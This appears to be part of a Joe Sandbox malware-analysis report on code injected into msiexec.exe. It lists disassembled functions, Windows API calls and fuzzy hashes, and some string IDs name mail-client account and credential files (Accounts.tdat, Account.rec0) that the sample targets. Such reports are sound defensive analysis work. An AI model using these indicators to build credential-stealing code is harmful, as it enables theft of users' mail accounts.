                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll$[nk/
                                                                            • API String ID: 4061214504-3366075403
                                                                            • Opcode ID: 5a074b1c6880ce9dd8a3a59c4b6990dddb7618dff869a950d97e9b33f1ed63ff
                                                                            • Instruction ID: 8cf41623ee5dfa745bf66dc2d1f899214d1c0cc2f2cde45e02e34dc2dd0465e8
                                                                            • Opcode Fuzzy Hash: 5a074b1c6880ce9dd8a3a59c4b6990dddb7618dff869a950d97e9b33f1ed63ff
                                                                            • Instruction Fuzzy Hash: 19F0AF71A01208BFDB11BF90DC08FAEBFF9EF06351F0001A5E90DE6145EB388942CA94
                                                                            Function 235F15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 235F1607
                                                                            • _strcat.LIBCMT ref: 235F161D
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,235F190E,?,?,00000000,?,00000000), ref: 235F1643
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 235F165A
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 235F1661
                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 235F1686
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                            • String ID:
                                                                            • API String ID: 1922816806-0
                                                                            • Opcode ID: 2aa6f6fca9d6012451925bb283b49d6b540735d3823019e18094bb6141ef1144
                                                                            • Instruction ID: 5582a3d17d535f5a3e5df54cf564563cfe6315069f57ac1267e8c7adf7cc429a
                                                                            • Opcode Fuzzy Hash: 2aa6f6fca9d6012451925bb283b49d6b540735d3823019e18094bb6141ef1144
                                                                            • Instruction Fuzzy Hash: A921DA76A00304BBCB14DB54EC85EEE77BCEF9A710F14405BE508EB145EB34E64687A9
                                                                            Function 235F1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 235F1038
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 235F104B
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 235F1061
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 235F1075
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 235F1090
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 235F10B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                            • String ID:
                                                                            • API String ID: 3594823470-0
                                                                            • Opcode ID: a10b7595f9d6746c29971de99692063fbf557c49fac9e91a61381fd540042321
                                                                            • Instruction ID: 871474d047dcdb06b851592dcf90613f50811defe06c862925b846c23b469760
                                                                            • Opcode Fuzzy Hash: a10b7595f9d6746c29971de99692063fbf557c49fac9e91a61381fd540042321
                                                                            • Instruction Fuzzy Hash: DE218E35900318ABCF20EB61EC58EDB377CEF85224F104296E95D971A1EE30DB86CB84
                                                                            Function 235F3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,235F3518,235F23F1,235F1F17), ref: 235F3864
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 235F3872
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 235F388B
                                                                            • SetLastError.KERNEL32(00000000,?,235F3518,235F23F1,235F1F17), ref: 235F38DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: d7d260714d0ba60730074d02212f50873ca90d4c47309fdc2335a22a4fc7f946
                                                                            • Instruction ID: 8d0a8fe713962072a99b6c04cd3da6cde9b45e5aa7b3d583580a242ccb092ba2
                                                                            • Opcode Fuzzy Hash: d7d260714d0ba60730074d02212f50873ca90d4c47309fdc2335a22a4fc7f946
                                                                            • Instruction Fuzzy Hash: 7001473260F7116EF7203679BD85D1A2BACEBA767973402BAE51C950D5EF1DCC029344
                                                                            Function 235F5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,235F6C6C), ref: 235F5AFA
                                                                            • _free.LIBCMT ref: 235F5B2D
                                                                            • _free.LIBCMT ref: 235F5B55
                                                                            • SetLastError.KERNEL32(00000000,?,?,235F6C6C), ref: 235F5B62
                                                                            • SetLastError.KERNEL32(00000000,?,?,235F6C6C), ref: 235F5B6E
                                                                            • _abort.LIBCMT ref: 235F5B74
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            • Opcode ID: 0ee998b17034bb8e940da4dcca2fe6edc350fec62ad6810eea285a889580207e
                                                                            • Instruction ID: 89e1f9ae074e7a8bef11590a2b4695a61ece63bfb894feb70b5d1aa33d7802fe
                                                                            • Opcode Fuzzy Hash: 0ee998b17034bb8e940da4dcca2fe6edc350fec62ad6810eea285a889580207e
                                                                            • Instruction Fuzzy Hash: AAF0F432145600ABC33232347C09F1E2ABDDBF3961B290CE5FA1ED6180FE24C4034164
                                                                            Function 235F86E4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,235F6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 235F8731
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 235F87BA
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 235F87CC
                                                                            • __freea.LIBCMT ref: 235F87D5
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID: [nk/
                                                                            • API String ID: 2652629310-416449849
                                                                            • Opcode ID: 49bd1eb642a7f062bb6cb7d2c578d82a016640fc07a97e4003a194545bd21d51
                                                                            • Instruction ID: 61281b93292719a8c4563eea7ee1baa9fe92d9af3350f7aa13df0c074396c97d
                                                                            • Opcode Fuzzy Hash: 49bd1eb642a7f062bb6cb7d2c578d82a016640fc07a97e4003a194545bd21d51
                                                                            • Instruction Fuzzy Hash: B031F432A0121AABDF249F65EC84EAF3BB5EF52310F2401A8ED08D7154E73AD951CB90
                                                                            Function 235F11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,?,?,?,235F10DF,?,?,?,00000000), ref: 235F1E9A
                                                                              • Part of subcall function 235F1E89: lstrcatW.KERNEL32(?,?,?,235F10DF,?,?,?,00000000), ref: 235F1EAC
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EB3
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EC8
                                                                              • Part of subcall function 235F1E89: lstrcatW.KERNEL32(?,235F10DF,?,235F10DF,?,?,?,00000000), ref: 235F1ED3
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 235F122A
                                                                              • Part of subcall function 235F173A: _strlen.LIBCMT ref: 235F1855
                                                                              • Part of subcall function 235F173A: _strlen.LIBCMT ref: 235F1869
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                            • API String ID: 4036392271-1520055953
                                                                            • Opcode ID: 9c56a8483f7396b740867b1ffb7a459283b382ecaaa5fec7014463ce14e00c54
                                                                            • Instruction ID: 8746052e620127217d64c5a7d54402ea3fba0aa28c65eb5e989ede96e13e6155
                                                                            • Opcode Fuzzy Hash: 9c56a8483f7396b740867b1ffb7a459283b382ecaaa5fec7014463ce14e00c54
                                                                            • Instruction Fuzzy Hash: FD21C579A103086BE72497D0EC91FEE7339EF90714F000586F608EB1D1EBB15E828758
                                                                            Function 235F7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 235F715C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 235F717F
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 235F71A5
                                                                            • _free.LIBCMT ref: 235F71B8
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 235F71C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: 778b5afa2e943f044ae244b8f8b21127253441f99615806f575f7a0b7fbab321
                                                                            • Instruction ID: 4c36f7eeaedc1387346cb6011c96d0aa224885ab6d91cedd4947d79f766e360d
                                                                            • Opcode Fuzzy Hash: 778b5afa2e943f044ae244b8f8b21127253441f99615806f575f7a0b7fbab321
                                                                            • Instruction Fuzzy Hash: 6301AC736022557FA3213ABA6C4CD7F6A6DDED79E031405AABD0CC7204EF648C0681B4
                                                                            Function 235F5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,235F636D,235F5713,00000000,?,235F2249,?,?,235F1D66,00000000,?,?,00000000), ref: 235F5B7F
                                                                            • _free.LIBCMT ref: 235F5BB4
                                                                            • _free.LIBCMT ref: 235F5BDB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F5BE8
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F5BF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 804ac8d9ba61165fd1b9754b810efb27f497e80c8d194f54816b7ae607cd15cc
                                                                            • Instruction ID: e6c32097edf854293b1266f0033cc03c291569c993c72da561426ea1dcc26954
                                                                            • Opcode Fuzzy Hash: 804ac8d9ba61165fd1b9754b810efb27f497e80c8d194f54816b7ae607cd15cc
                                                                            • Instruction Fuzzy Hash: 5701D172205701BBC33236757C88E1F2ABDDBE35B57280CE5F91FD2146EE28C9024164
                                                                            Function 235F1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,235F10DF,?,?,?,00000000), ref: 235F1E9A
                                                                            • lstrcatW.KERNEL32(?,?,?,235F10DF,?,?,?,00000000), ref: 235F1EAC
                                                                            • lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EB3
                                                                            • lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EC8
                                                                            • lstrcatW.KERNEL32(?,235F10DF,?,235F10DF,?,?,?,00000000), ref: 235F1ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat
                                                                            • String ID:
                                                                            • API String ID: 493641738-0
                                                                            • Opcode ID: 13e2814fdb89318ab47bec09cfd74ed1ad06e6ce1a0f2d5a0a7e0492841c0f16
                                                                            • Instruction ID: 90b69e7f98192e1411b9eb4891681392eef846c87fcdb3cdf430dd879ece1665
                                                                            • Opcode Fuzzy Hash: 13e2814fdb89318ab47bec09cfd74ed1ad06e6ce1a0f2d5a0a7e0492841c0f16
                                                                            • Instruction Fuzzy Hash: 21F082361002107BD621372AAC89EBF7BBCEFD7B60B04001AFA0CC3194BB59594392B9
                                                                            Function 235F91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F91D0
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F91E2
                                                                            • _free.LIBCMT ref: 235F91F4
                                                                            • _free.LIBCMT ref: 235F9206
                                                                            • _free.LIBCMT ref: 235F9218
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: be3e0c6b802f07119ca8a2513aee0ed3b7522ee5f35230f1d0a11fadad060755
                                                                            • Instruction ID: f4351a890f7d087d1af31a91b369572ef97ffa53cb2346b326d7cc6881f25e73
                                                                            • Opcode Fuzzy Hash: be3e0c6b802f07119ca8a2513aee0ed3b7522ee5f35230f1d0a11fadad060755
                                                                            • Instruction Fuzzy Hash: FCF04F71519680D7C660FA59F5C9C1A7BFDFB623557780C85E90ED7504CA24F8808A58
                                                                            Function 235F5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F536F
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F5381
                                                                            • _free.LIBCMT ref: 235F5394
                                                                            • _free.LIBCMT ref: 235F53A5
                                                                            • _free.LIBCMT ref: 235F53B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 0df0ee7e63da7f96334557b35f18ef055bfe0781ff83532008b2c6c5d34fdd54
                                                                            • Instruction ID: 17753c9d5d5abe225ad7c0c6cd1cc6d7e5f4e833b58e2fd468469d524674c080
                                                                            • Opcode Fuzzy Hash: 0df0ee7e63da7f96334557b35f18ef055bfe0781ff83532008b2c6c5d34fdd54
                                                                            • Instruction Fuzzy Hash: 37F0F970919210DA87267F25A5824283FBDB736659339498AE815932A9DB6985018F81
                                                                            Function 235F9B0D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [nk/
                                                                            • API String ID: 0-416449849
                                                                            • Opcode ID: ae0eaa24ddf3e628303f3596d618aaeec523fe9b926b3319366f7a57273f4731
                                                                            • Instruction ID: b7708112812897f4384dcfe955a58c6c072206dac84b0e54a81a0d8a56747b17
                                                                            • Opcode Fuzzy Hash: ae0eaa24ddf3e628303f3596d618aaeec523fe9b926b3319366f7a57273f4731
                                                                            • Instruction Fuzzy Hash: B9519F71D0460AABDB11AFA8E844FEEBBF8EF97314F140499E50CA7291D735DA01CB61
                                                                            Function 235F63F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F655C
                                                                              • Part of subcall function 235F62BC: IsProcessorFeaturePresent.KERNEL32(00000017,235F62AB,00000000,?,?,?,?,00000016,?,?,235F62B8,00000000,00000000,00000000,00000000,00000000), ref: 235F62BE
                                                                              • Part of subcall function 235F62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 235F62E0
                                                                              • Part of subcall function 235F62BC: TerminateProcess.KERNEL32(00000000), ref: 235F62E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                            • String ID: *?$.$[nk/
                                                                            • API String ID: 2667617558-3326510684
                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction ID: 2b4bb2d16fd583af200b0e7189d46647d4898c5f57cfe880540613f97fda3608
                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction Fuzzy Hash: CB51A375E0020AEFDF14DFA8D880AADBBF9FF99314F2481A9D458E7345E635DA018B50
                                                                            Function 235F4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 235F4C1D
                                                                            • _free.LIBCMT ref: 235F4CE8
                                                                            • _free.LIBCMT ref: 235F4CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Windows\System32\msiexec.exe
                                                                            • API String ID: 2506810119-1382325751
                                                                            • Opcode ID: 947d26d0b863180e35d60e930c95d5fe3859f3d572d81a817b7ef1cb52ba07e0
                                                                            • Instruction ID: 9c2a6bffcb0da07b8d5ce069ce7a6cfdf87e9d3f97a441c3a326a4c8b37eb6cb
                                                                            • Opcode Fuzzy Hash: 947d26d0b863180e35d60e930c95d5fe3859f3d572d81a817b7ef1cb52ba07e0
                                                                            • Instruction Fuzzy Hash: 7E3152B1B04318AFDB21EF99A985D9EBBFCFB96714B2440D6E90897200D675CA41CB60
                                                                            Function 235F98F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,235F9C54,?,00000000,?), ref: 235F99A8
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,235F9C54,?,00000000,?,00000000,00000000,?,00000000), ref: 235F99D6
                                                                            • GetLastError.KERNEL32(?,235F9C54,?,00000000,?,00000000,00000000,?,00000000), ref: 235F9A07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 2456169464-416449849
                                                                            • Opcode ID: 1a92652a348850a7df68e916c2d516b45be5a0a63b29b25f07958727582a9258
                                                                            • Instruction ID: 4058d672083dfa0278f092c34bcc635f505c98784c106efcaed8bcefbab5d0ca
                                                                            • Opcode Fuzzy Hash: 1a92652a348850a7df68e916c2d516b45be5a0a63b29b25f07958727582a9258
                                                                            • Instruction Fuzzy Hash: 53317075A002199FDB24DF29DD819EAB7B8EB49304F1444AEE94AD7250D730AE81CB60
                                                                            Function 235FC7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(235FC7DD), ref: 235FC7E6
                                                                            • GetModuleHandleA.KERNEL32(?,235FC7DD), ref: 235FC838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 235FC860
                                                                              • Part of subcall function 235FC803: GetProcAddress.KERNEL32(00000000,235FC7F4), ref: 235FC804
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID:
                                                                            • API String ID: 1646373207-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: ee9598925292f909e91ca1daab7f1020bb93e608617cb65867cfb3c6e647d104
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: E101F50098534138EB2166747C01EFA5FEC9B67AA0B181BF6E24DDB193D9A0C506D3FA
                                                                            Function 235F5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,235F1D66,00000000,00000000,?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue), ref: 235F5D13
